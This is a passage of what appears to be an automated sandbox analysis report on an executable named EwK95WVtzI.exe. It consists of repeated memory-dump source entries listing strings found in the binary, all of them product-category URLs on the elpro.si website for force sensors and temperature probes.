00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-tlacne-sile/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/upogibni-nosilci-strizni-nosilci/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/temperat
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/cryo-temp-temperaturna-tipala-za-z
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/digital-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/dodatna-oprema-za-temperaturna-tip
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/ex-temperaturna-tipala-z-atex-cert
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/field-mounted-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/high-temp-temperaturna-tipala-za-v
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/tempe
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/kanalska-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/mims-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/nastavljiva-temperaturna-tipala-2/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/on-site-cal-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 